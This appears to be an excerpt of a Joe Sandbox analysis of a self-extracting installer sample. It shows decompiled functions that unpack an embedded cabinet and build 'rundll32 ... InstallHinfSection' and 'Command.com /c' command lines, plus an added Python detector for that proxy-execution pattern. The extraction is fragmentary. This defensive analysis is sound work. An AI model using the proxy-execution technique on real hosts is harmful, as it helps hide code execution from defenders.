                                                                                                                                                                                                                                    											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										_push( &_v268);
                                                                                                                                                                                                                                    										_push(_t155);
                                                                                                                                                                                                                                    										E0040171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										 *0x409a34 =  *0x409a34 | 0x00000004;
                                                                                                                                                                                                                                    										if( *_t155 == 0) {
                                                                                                                                                                                                                                    											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										E00401680(_t108, 0x104, _t155);
                                                                                                                                                                                                                                    										_t140 = 0x200;
                                                                                                                                                                                                                                    										E00401680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									L53:
                                                                                                                                                                                                                                    									_t62 = 1;
                                                                                                                                                                                                                                    									 *_v1564 = _t156;
                                                                                                                                                                                                                                    									L54:
                                                                                                                                                                                                                                    									_pop(_t152);
                                                                                                                                                                                                                                    									return E00406CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}
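The fragment above decides how an embedded INF is to be installed and formats the `rundll32.exe <dll>,InstallHinfSection <section> 128 <inf>` command line that the Rundll32 proxy-execution technique (T1218.011) relies on. The Python below re-implements that decision logic on constructed INF text and turns the resulting command line into a simple process-creation check. It is an added example for this report, not code from the sample, from Joe Sandbox or from any project. Assumed, because the listing does not spell them out: the `file.inf[Section]` syntax for the bracketed section suffix, that the global at 0x409a40 records whether setupapi.dll is available, and every INF file, path and log line, all of which are constructed.

```python
"""Re-implementation of the INF-install decision logic seen in the decompiled
listing.  Added illustration for this report: not code from the sample, from
Joe Sandbox or from any project.  All INF text, paths and log lines below are
constructed."""
import re

# Constructed INF files (not taken from the sample).
SAMPLE_INF_PLAIN = """[Version]
Signature="$Chicago$"

[DefaultInstall]
Reboot=1

[Quiet]
Reboot=0
"""

SAMPLE_INF_ADVANCED = """[Version]
Signature="$Chicago$"
AdvancedINF=2.5

[DefaultInstall]
RunPreSetupCommands=Pre
"""

# Constructed process-creation lines (not taken from the report).
SAMPLE_PROCESS_LINES = [
    r"C:\Windows\System32\rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Users\Public\setup.inf",
    r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
    r"C:\Windows\rundll32.exe setupx.dll,InstallHinfSection Quiet 128 C:\PROGRA~1\SETUP.INF",
    r"C:\Windows\explorer.exe",
]


def parse_inf(text):
    """Minimal INI parser with the GetPrivateProfile* semantics that matter here:
    case-insensitive sections and keys, ';' comments, surrounding quotes stripped."""
    data, section = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            data.setdefault(section, {})
        elif "=" in line and section is not None:
            key, value = (part.strip() for part in line.split("=", 1))
            if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
                value = value[1:-1]
            data[section][key.lower()] = value
    return data


def profile_string(inf, section, key, default=""):
    return inf.get(section.lower(), {}).get(key.lower(), default)


def profile_int(inf, section, key, default=0):
    try:
        return int(profile_string(inf, section, key, str(default)))
    except ValueError:
        return default


def split_section_spec(spec):
    """Mirror of the '[' / ']' carving in the listing.  The exact
    'file.inf[Section]' spelling is an assumption; an empty or missing section
    falls back to DefaultInstall, as the listing does."""
    match = re.search(r"\[([^\]]*)\]", spec)
    if match:
        return spec[: match.start()], (match.group(1).strip() or "DefaultInstall")
    return spec, "DefaultInstall"


def plan_inf_install(inf_text, spec, has_setupapi=True):
    """Return what the listing would do with this INF: the rundll32 command line
    for a plain INF, or a marker for the advanced-INF path it does not show."""
    inf_path, section = split_section_spec(spec)
    inf = parse_inf(inf_text)
    # The sample caches Reboot= from the chosen section in a global.
    reboot = profile_int(inf, section, "Reboot", 0)
    if profile_string(inf, "Version", "AdvancedINF") == "":
        # has_setupapi stands in for the global at 0x409a40 (assumption); the
        # alternative setupx.dll is the Windows 9x setup library.  Flag 128 makes
        # InstallHinfSection use the INF's directory as the source path.
        dll = "setupapi.dll" if has_setupapi else "setupx.dll"
        cmd = "rundll32.exe %s,InstallHinfSection %s 128 %s" % (dll, section, inf_path)
        return {"mode": "inf", "command": cmd, "reboot": reboot}
    # AdvancedINF present: the listing only copies section and path into buffers
    # for a code path outside the excerpt, so no command line is produced here.
    return {"mode": "advanced", "section": section, "inf": inf_path, "reboot": reboot}


# Process-creation check: rundll32 invoking InstallHinfSection from any DLL.
INF_INSTALL_RE = re.compile(r"\brundll32(?:\.exe)?\b.*?,\s*InstallHinfSection\b", re.I)


def flag_inf_installs(process_lines):
    """Return the process-creation lines that match the command line the sample builds."""
    return [line for line in process_lines if INF_INSTALL_RE.search(line)]
```

On a current Windows host the sample always lands on the setupapi.dll branch, so the thing to alert on is any `rundll32` process whose command line carries `InstallHinfSection` and an INF outside the usual driver-installation locations; the setupx.dll form is kept only because the listing still emits it.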
Instruction address column from the decompiler listing (detached during extraction; the listed addresses run from 0x00401af3 to 0x00401bc2).
                                                                                                                                                                                                                                    0x00401b98
                                                                                                                                                                                                                                    0x00401bc7
                                                                                                                                                                                                                                    0x00401bc9
                                                                                                                                                                                                                                    0x00401bcc
                                                                                                                                                                                                                                    0x00401bd3
                                                                                                                                                                                                                                    0x00401d75
                                                                                                                                                                                                                                    0x00401d76
                                                                                                                                                                                                                                    0x00401d78
                                                                                                                                                                                                                                    0x00401d7f
                                                                                                                                                                                                                                    0x00401e05
                                                                                                                                                                                                                                    0x00401e09
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401e12
                                                                                                                                                                                                                                    0x00401e1b
                                                                                                                                                                                                                                    0x00401e73
                                                                                                                                                                                                                                    0x00401e21
                                                                                                                                                                                                                                    0x00401e21
                                                                                                                                                                                                                                    0x00401e28
                                                                                                                                                                                                                                    0x00401e37
                                                                                                                                                                                                                                    0x00401e3e
                                                                                                                                                                                                                                    0x00401e52
                                                                                                                                                                                                                                    0x00401e60
                                                                                                                                                                                                                                    0x00401e60
                                                                                                                                                                                                                                    0x00401e3e
                                                                                                                                                                                                                                    0x00401e79
                                                                                                                                                                                                                                    0x00401e7b
                                                                                                                                                                                                                                    0x00401e84
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401d9b
                                                                                                                                                                                                                                    0x00401d9b
                                                                                                                                                                                                                                    0x00401da0
                                                                                                                                                                                                                                    0x00401da2
                                                                                                                                                                                                                                    0x00401da5
                                                                                                                                                                                                                                    0x00401da5
                                                                                                                                                                                                                                    0x00401da7
                                                                                                                                                                                                                                    0x00401da8
                                                                                                                                                                                                                                    0x00401dac
                                                                                                                                                                                                                                    0x00401dae
                                                                                                                                                                                                                                    0x00401db4
                                                                                                                                                                                                                                    0x00401db7
                                                                                                                                                                                                                                    0x00401db7
                                                                                                                                                                                                                                    0x00401db9
                                                                                                                                                                                                                                    0x00401dba
                                                                                                                                                                                                                                    0x00401dbe
                                                                                                                                                                                                                                    0x00401dc3
                                                                                                                                                                                                                                    0x00401dce
                                                                                                                                                                                                                                    0x00401dd2
                                                                                                                                                                                                                                    0x00401deb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401df0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401dd2
                                                                                                                                                                                                                                    0x00401bf7
                                                                                                                                                                                                                                    0x00401bfe
                                                                                                                                                                                                                                    0x00401c07
                                                                                                                                                                                                                                    0x00401d55
                                                                                                                                                                                                                                    0x00401d5a
                                                                                                                                                                                                                                    0x00401d5b
                                                                                                                                                                                                                                    0x00401d5d
                                                                                                                                                                                                                                    0x00401d5e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401c1b
                                                                                                                                                                                                                                    0x00401c1b
                                                                                                                                                                                                                                    0x00401c20
                                                                                                                                                                                                                                    0x00401c2c
                                                                                                                                                                                                                                    0x00401c33
                                                                                                                                                                                                                                    0x00401c38
                                                                                                                                                                                                                                    0x00401c3a
                                                                                                                                                                                                                                    0x00401c3a
                                                                                                                                                                                                                                    0x00401c40
                                                                                                                                                                                                                                    0x00401c4b
                                                                                                                                                                                                                                    0x00401c4b
                                                                                                                                                                                                                                    0x00401c5d
                                                                                                                                                                                                                                    0x00401c61
                                                                                                                                                                                                                                    0x00401dd4
                                                                                                                                                                                                                                    0x00401dd4
                                                                                                                                                                                                                                    0x00401dd6
                                                                                                                                                                                                                                    0x00401ddb
                                                                                                                                                                                                                                    0x00401ddc
                                                                                                                                                                                                                                    0x00401dde
                                                                                                                                                                                                                                    0x00401d64
                                                                                                                                                                                                                                    0x00401d64
                                                                                                                                                                                                                                    0x00401d67
                                                                                                                                                                                                                                    0x00401d6c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401c67
                                                                                                                                                                                                                                    0x00401c67
                                                                                                                                                                                                                                    0x00401c6d
                                                                                                                                                                                                                                    0x00401c72
                                                                                                                                                                                                                                    0x00401c74
                                                                                                                                                                                                                                    0x00401c74
                                                                                                                                                                                                                                    0x00401c8e
                                                                                                                                                                                                                                    0x00401c99
                                                                                                                                                                                                                                    0x00401cc0
                                                                                                                                                                                                                                    0x00401cf8
                                                                                                                                                                                                                                    0x00401d07
                                                                                                                                                                                                                                    0x00401d23
                                                                                                                                                                                                                                    0x00401d09
                                                                                                                                                                                                                                    0x00401d14
                                                                                                                                                                                                                                    0x00401d1b
                                                                                                                                                                                                                                    0x00401d1b
                                                                                                                                                                                                                                    0x00401d2b
                                                                                                                                                                                                                                    0x00401d2d
                                                                                                                                                                                                                                    0x00401d2d
                                                                                                                                                                                                                                    0x00401d38
                                                                                                                                                                                                                                    0x00401d39
                                                                                                                                                                                                                                    0x00401d46
                                                                                                                                                                                                                                    0x00401cc2
                                                                                                                                                                                                                                    0x00401cc2
                                                                                                                                                                                                                                    0x00401ccc
                                                                                                                                                                                                                                    0x00401cce
                                                                                                                                                                                                                                    0x00401cce
                                                                                                                                                                                                                                    0x00401cdb
                                                                                                                                                                                                                                    0x00401ce6
                                                                                                                                                                                                                                    0x00401cee

APIs
• CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00401BE7
• GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00401BFE
• LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00401C57
• GetPrivateProfileIntA.KERNEL32 ref: 00401C88
• GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00401140,00000000,00000008,?), ref: 00401CB8
• GetShortPathNameA.KERNEL32 ref: 00401D1B
  • Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
  • Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554
Strings
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
• String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
• API String ID: 383838535-3368923722
• Opcode ID: c5cde542d379b8b3dcabaeaf6ab9f809cbf586cc6fbce848f7e7d0055dd29b84
• Instruction ID: 1854ec0ea07248ced4697d7887c5e08e33d5be07c387e2280b7d80fdedc59c7f
• Opcode Fuzzy Hash: c5cde542d379b8b3dcabaeaf6ab9f809cbf586cc6fbce848f7e7d0055dd29b84
• Instruction Fuzzy Hash: 02A15870A002186BEB209B24CC44FEA3769AF55314F1442BBF955B72E1DBBC9D86CB5C
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
(rendered control-flow graph for function E0040597D at 0040597D; the graph image is not recoverable from the extracted text)
C-Code - Quality: 96%
E0040597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
	signed int _v8;
	char _v16;
	char _v276;
	char _v788;
	long _v792;
	long _v796;
	long _v800;
	signed int _v804;
	long _v808;
	int _v812;
	long _v816;
	long _v820;
	void* __ebx;
	void* __esi;
	signed int _t46;
	int _t50;
	signed int _t55;
	void* _t66;
	int _t69;
	signed int _t73;
	signed short _t78;
	signed int _t87;
	signed int _t101;
	int _t102;
	unsigned int _t103;
	unsigned int _t105;
	signed int _t111;
	long _t112;
	signed int _t116;
	CHAR* _t118;
	signed int _t119;
	signed int _t120;

	_t114 = __edi;
	_t46 =  *0x408004; // 0x8f135e3b
	_v8 = _t46 ^ _t120;
	_v804 = __edx;
	_t118 = __ecx;
	GetCurrentDirectoryA(0x104,  &_v276);
	_t50 = SetCurrentDirectoryA(_t118); // executed
	if(_t50 != 0) {
		_push(__edi);
		_v796 = 0;
		_v792 = 0;
		_v800 = 0;
		_v808 = 0;
		_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
		__eflags = _t55;
		if(_t55 == 0) {
			L29:
			memset( &_v788, 0, 0x200);
			 *0x409124 = E00406285();
			FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
			_t110 = 0x4b0;
			L30:
			__eflags = 0;
			E004044B9(0, _t110, _t118,  &_v788, 0x10, 0);
			SetCurrentDirectoryA( &_v276);
			L31:
			_t66 = 0;
			__eflags = 0;
			L32:
			_pop(_t114);
			goto L33;
		}
		_t69 = _v792 * _v796;
		_v812 = _t69;
		_t116 = MulDiv(_t69, _v800, 0x400);
		__eflags = _t116;
		if(_t116 == 0) {
			goto L29;
		}
		_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
		__eflags = _t73;
		if(_t73 != 0) {
			SetCurrentDirectoryA( &_v276); // executed
			_t101 =  &_v16;
			_t111 = 6;
			_t119 = _t118 - _t101;
			__eflags = _t119;
			while(1) {
				_t22 = _t111 - 4; // 0x2
				__eflags = _t22;
				if(_t22 == 0) {
					break;
				}
				_t87 =  *((intOrPtr*)(_t119 + _t101));
				__eflags = _t87;
				if(_t87 == 0) {
					break;
				}
				 *_t101 = _t87;
				_t101 = _t101 + 1;
                                                                                                                                                                                                                                    							_t111 = _t111 - 1;
                                                                                                                                                                                                                                    							__eflags = _t111;
                                                                                                                                                                                                                                    							if(_t111 != 0) {
                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						__eflags = _t111;
                                                                                                                                                                                                                                    						if(_t111 == 0) {
                                                                                                                                                                                                                                    							_t101 = _t101 - 1;
                                                                                                                                                                                                                                    							__eflags = _t101;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						 *_t101 = 0;
                                                                                                                                                                                                                                    						_t112 = 0x200;
                                                                                                                                                                                                                                    						_t102 = _v812;
                                                                                                                                                                                                                                    						_t78 = 0;
                                                                                                                                                                                                                                    						_t118 = 8;
                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                    							__eflags = _t102 - _t112;
                                                                                                                                                                                                                                    							if(_t102 == _t112) {
                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t112 = _t112 + _t112;
                                                                                                                                                                                                                                    							_t78 = _t78 + 1;
                                                                                                                                                                                                                                    							__eflags = _t78 - _t118;
                                                                                                                                                                                                                                    							if(_t78 < _t118) {
                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						__eflags = _t78 - _t118;
                                                                                                                                                                                                                                    						if(_t78 != _t118) {
                                                                                                                                                                                                                                    							__eflags =  *0x409a34 & 0x00000008;
                                                                                                                                                                                                                                    							if(( *0x409a34 & 0x00000008) == 0) {
                                                                                                                                                                                                                                    								L20:
                                                                                                                                                                                                                                    								_t103 =  *0x409a38; // 0x0
                                                                                                                                                                                                                                    								_t110 =  *((intOrPtr*)(0x4089e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                    								L21:
                                                                                                                                                                                                                                    								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                                                    								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                                                    									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                                                    									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                                                    										__eflags = _t103 - _t116;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										__eflags = _t110 - _t116;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								if(__eflags <= 0) {
                                                                                                                                                                                                                                    									 *0x409124 = 0;
                                                                                                                                                                                                                                    									_t66 = 1;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_t66 = E0040268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                                                    							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                                                    								goto L20;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t105 =  *0x409a38; // 0x0
                                                                                                                                                                                                                                    							_t110 =  *((intOrPtr*)(0x4089e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x4089e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                    							_t103 = (_t105 >> 2) +  *0x409a38;
                                                                                                                                                                                                                                    							goto L21;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t110 = 0x4c5;
                                                                                                                                                                                                                                    						E004044B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    						goto L31;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                    					 *0x409124 = E00406285();
                                                                                                                                                                                                                                    					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                    					_t110 = 0x4f9;
                                                                                                                                                                                                                                    					goto L30;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t110 = 0x4bc;
                                                                                                                                                                                                                                    					E004044B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    					 *0x409124 = E00406285();
                                                                                                                                                                                                                                    					_t66 = 0;
                                                                                                                                                                                                                                    					L33:
                                                                                                                                                                                                                                    					return E00406CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}
                                                                                                                                                                                                                                    0x00405aca
                                                                                                                                                                                                                                    0x00405aca
                                                                                                                                                                                                                                    0x00405acc
                                                                                                                                                                                                                                    0x00405acc
                                                                                                                                                                                                                                    0x00405acf
                                                                                                                                                                                                                                    0x00405ad1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405ad3
                                                                                                                                                                                                                                    0x00405ad6
                                                                                                                                                                                                                                    0x00405ad8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405ada
                                                                                                                                                                                                                                    0x00405adc
                                                                                                                                                                                                                                    0x00405add
                                                                                                                                                                                                                                    0x00405add
                                                                                                                                                                                                                                    0x00405ae0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405ae0
                                                                                                                                                                                                                                    0x00405ae2
                                                                                                                                                                                                                                    0x00405ae4
                                                                                                                                                                                                                                    0x00405ae6
                                                                                                                                                                                                                                    0x00405ae6
                                                                                                                                                                                                                                    0x00405ae6
                                                                                                                                                                                                                                    0x00405ae9
                                                                                                                                                                                                                                    0x00405aeb
                                                                                                                                                                                                                                    0x00405af0
                                                                                                                                                                                                                                    0x00405af6
                                                                                                                                                                                                                                    0x00405af8
                                                                                                                                                                                                                                    0x00405af9
                                                                                                                                                                                                                                    0x00405af9
                                                                                                                                                                                                                                    0x00405afb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405afd
                                                                                                                                                                                                                                    0x00405aff
                                                                                                                                                                                                                                    0x00405b00
                                                                                                                                                                                                                                    0x00405b03
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405b03
                                                                                                                                                                                                                                    0x00405b05
                                                                                                                                                                                                                                    0x00405b08
                                                                                                                                                                                                                                    0x00405b20
                                                                                                                                                                                                                                    0x00405b27
                                                                                                                                                                                                                                    0x00405b52
                                                                                                                                                                                                                                    0x00405b52
                                                                                                                                                                                                                                    0x00405b5b
                                                                                                                                                                                                                                    0x00405b62
                                                                                                                                                                                                                                    0x00405b6b
                                                                                                                                                                                                                                    0x00405b6d
                                                                                                                                                                                                                                    0x00405b76
                                                                                                                                                                                                                                    0x00405b7d
                                                                                                                                                                                                                                    0x00405b83
                                                                                                                                                                                                                                    0x00405b7f
                                                                                                                                                                                                                                    0x00405b7f
                                                                                                                                                                                                                                    0x00405b7f
                                                                                                                                                                                                                                    0x00405b6f
                                                                                                                                                                                                                                    0x00405b72
                                                                                                                                                                                                                                    0x00405b72
                                                                                                                                                                                                                                    0x00405b85
                                                                                                                                                                                                                                    0x00405b98
                                                                                                                                                                                                                                    0x00405b9e
                                                                                                                                                                                                                                    0x00405b87
                                                                                                                                                                                                                                    0x00405b8f
                                                                                                                                                                                                                                    0x00405b8f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405b85
                                                                                                                                                                                                                                    0x00405b29
                                                                                                                                                                                                                                    0x00405b33
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405b35
                                                                                                                                                                                                                                    0x00405b48
                                                                                                                                                                                                                                    0x00405b4a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405b4a
                                                                                                                                                                                                                                    0x00405b0f
                                                                                                                                                                                                                                    0x00405b16
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405b16
                                                                                                                                                                                                                                    0x00405a7c
                                                                                                                                                                                                                                    0x00405a8a
                                                                                                                                                                                                                                    0x00405aa5
                                                                                                                                                                                                                                    0x00405aab
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004059bb
                                                                                                                                                                                                                                    0x004059c0
                                                                                                                                                                                                                                    0x004059c7
                                                                                                                                                                                                                                    0x004059d1
                                                                                                                                                                                                                                    0x004059d6
                                                                                                                                                                                                                                    0x00405c05
                                                                                                                                                                                                                                    0x00405c14
                                                                                                                                                                                                                                    0x00405c14

APIs
• GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 004059A8
• SetCurrentDirectoryA.KERNELBASE(?), ref: 004059AF
• GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00405A13
• MulDiv.KERNEL32(?,?,00000400), ref: 00405A40
• GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00405A64
• memset.MSVCRT ref: 00405A7C
• GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00405A98
• FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00405AA5
• SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00405BFC
  • Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
  • Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554
  • Part of subcall function 00406285: GetLastError.KERNEL32(00405BBC), ref: 00406285
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
• String ID:
• API String ID: 4237285672-0
• Opcode ID: 6aaf8c91b5dca31200441e902ea9edd8fd2e2a5f7089ede1390eec398b18bba2
• Instruction ID: 43d5c1b8738d8d9cee642188910e7ae7015c6787622b6f388fd3a53d4582656a
• Opcode Fuzzy Hash: 6aaf8c91b5dca31200441e902ea9edd8fd2e2a5f7089ede1390eec398b18bba2
• Instruction Fuzzy Hash: E67195B1A0020CAFEB159F60CD85BFB77BCEB48304F0440BAF545B6281D6389E458F69
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph (legend: Executed / Not Executed; graph image of blocks 404fe0-405163)

C-Code - Quality: 77%
			// Decompiled function at 0x00404fe0. Comments added by the editor: it locates a
			// raw-data resource named "CABINET" and feeds it to a cabinet-decompression API
			// imported by ordinal, which is consistent with a self-extracting installer stub.
			E00404FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0x409144 = E0040468F(_t36, 0, 0);
				// Resource type 0xa is RT_RCDATA: the embedded cabinet is stored as raw data
				// and locked in memory, never written to disk at this point.
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0x409140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0x408584; // 0x0, main dialog window handle
				if(_t9 != 0) {
					// SW_HIDE (0) control 0x842, SW_SHOW (5) control 0x841: switch the dialog to its "extracting" view.
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0x408584, 0x841), 5);
				}
				_t10 = E00404EFD(0, 0);
				if(_t10 != 0) {
					// Ordinal import #20: the argument layout (seven callbacks: alloc, free, open, read,
					// write, close, seek; cpu type 1; an error structure at 0x409148) matches
					// cabinet.dll FDICreate. The import module name is not shown in this excerpt, so
					// the FDI* identification is a likely reading, not confirmed by the report.
					__imp__#20(E00404CA0, E00404CC0, E00404980, E00404A50, E00404AD0, E00404B60, E00404BC0, 1, 0x409148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						// Failure path: E004044B9 appears to be a message-box helper taking a string
						// resource id; 0x10 would be MB_ICONHAND if it is passed through to MessageBox (assumption).
						_t29 =  *0x409148; // 0x0
						_t24 =  *0x408584; // 0x0
						E004044B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					// Ordinal import #22 with a "*MEMCAB" pseudo-name, a notification callback
					// (E00404CD0) and the locked resource pointer (0x409140) as user data: layout of
					// FDICopy, i.e. the cabinet is decompressed straight from memory.
					__imp__#22(_t34, "*MEMCAB", 0x401140, 0, E00404CD0, 0, 0x409140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					// Ordinal import #23 on the same handle: layout of FDIDestroy.
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0x408584; // 0x0
					E004044B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					// Common exit: release the locked resource handle.
					_t12 =  *0x409140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0x409140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0x4091d8; // 0x0
						if(_t47 == 0) {
							E004044B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					// Unless either of two configuration flags is set, post application-defined
					// message 0xfa1 with the extraction result to the dialog.
					if(( *0x408a38 & 0x00000001) == 0 && ( *0x409a34 & 0x00000001) == 0) {
						SendMessageA( *0x408584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}
                                                                                                                                                                                                                                    0x00405141
                                                                                                                                                                                                                                    0x00405159
                                                                                                                                                                                                                                    0x00405159
                                                                                                                                                                                                                                    0x00000000
